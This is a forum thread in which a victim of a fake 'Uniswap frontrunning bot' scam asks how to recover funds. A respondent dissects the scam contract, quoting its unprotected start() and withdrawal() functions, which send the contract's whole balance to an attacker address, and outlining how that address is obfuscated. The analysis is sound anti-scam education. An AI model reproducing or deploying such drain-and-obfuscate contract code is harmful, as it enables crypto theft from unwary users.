Uniswap frontrun smart contract scam?

Smart Contracts
1

Hello lads,

I have deployed a smart contract that i copy-pasted from a youtube video that is pretending to be a "uniswap frontrunning bot". Yes that was very noob of me because i didn't know the risks at the beginning.
after that, as it was indicated, i had to fund the contract address.
i did research about this type of scam very late, because the yt video seemed very legit (content quality, comments etc...). After research i found out this is a scam, so i didn't used the start / withdraw functions on the contract.
Is there a way to edit the deployed contract functions in order to get funds back to my address ? i have deployed it using Remix.
Contract code here : https://pastebin.com/PhQEkjir
Thanks in advance,

2

Unfortunatly you can't.

image
image734×156 10 KB

Remix warn users too...

1 Like
3

Thanks Freezy.
I guess i better keep the funds blocked in the smart contract then so the scammer don't get them :rage:

4

Lets take this opportunity to try to learn how solidity works:

In the contract you copied there are 2 function that should interrest you:

  • start()
  • withdrawal()

The code for these two function is the following:

    function start() public payable { 
        emit Log("Running FrontRun attack on Uniswap. This can take a while please wait...");
        payable(_callFrontRunActionMempool()).transfer(address(this).balance);
    }
 
    function withdrawal() public payable { 
        emit Log("Sending profits back to contract creator address...");
        payable(withdrawalProfits()).transfer(address(this).balance);
    }

You'll notice that woth are very similar. In both cases they emit an event, that is suppose to say what is happening for websites/indexers to react. In that case the content is just a bullshit string.

Then there is the actual code:

        payable(_callFrontRunActionMempool()).transfer(address(this).balance);

and

        payable(withdrawalProfits()).transfer(address(this).balance);

You can see that in both cases its very similar. It takes some address, and does a transfer to it, sending the entier balance of the contract. (transfer sends ETH, and address(this).balance is the amount of ETH currently held by the contract).

Neither of these function has access protection. So anyone (you, me, the scammer) can call the function and drain the assets. Only thing he needs is the address of the contract. Note that if the scammer was smart, he would put an event in the constructor to help him detect instances deploy by victims in case the victim stops halfway through the process like you did.

But then what is this address that the funds are sent to ? In both cases its the same:

    function _callFrontRunActionMempool() internal pure returns (address) {
        return parseMemoryPool(callMempool());
    }

    function withdrawalProfits() internal pure returns (address) {
        return parseMemoryPool(callMempool());
    }

parseMemoryPool is just a function that turns a hex string into an address. Its not very well written, but it works. If you go look at callMempool() code, you'll see its just tring to obfuscate the address of the attacker. Once you understand that the mempool() function is string concatenation and that checkLiquidity() is int to hex string (with a left padding) you can reconstruct the address of the scammer.

Understanding how the scammer obfuscate its address into the code using bullshit variables like _memPoolSize is not that easy. But understanding what the start and withdrawal function do is actualy not that hard when you look into it.

Be carefull of scammers, there are many, and they are very creative. One thing to keep in mind is: if it sounds to good to be true, then it probably is. If there was an easy and profitable way to frontrun uniswap trades, that person would not tell you about it, and would exploit it itself. Frontrunning is actually a thing, but its very different from what that scammer claims. Its very hard to setup, and the few people that manage to profit from it will not tell there competition their secrets.

5

Really thanks for these explanations @Amxx , the way that this code works (despite its "simplicity") is quite fascinating.
To be honest i wasn't interested in solidity development, and had no idea about how smart contacts work. But this scam allowed me to discover it. I guess i will start learning it and try launching my own smart contracts soon :slight_smile:

[quote="Amxx, post:4, topic:37075"]
Note that if the scammer was smart, he would put an event in the constructor to help him detect instances deploy by victims in case the victim stops halfway through the process like you did.
[/quote] => By the way, the scam is even worse than that, he shared a fake remix link (a remix fork surely) that i have used... which allow him to track addresses probably. since i didn't know about Remix at all... it's okay, we learn from errors like that.

By the way, if someone is curious, here is the scam video /!\ SCAM ALERT, DO NOT FOLLOW INSTRUCTIONS /!\
Scammers became very creative, the content quality is really good.... please don't hesitate to report the channel

Many thanks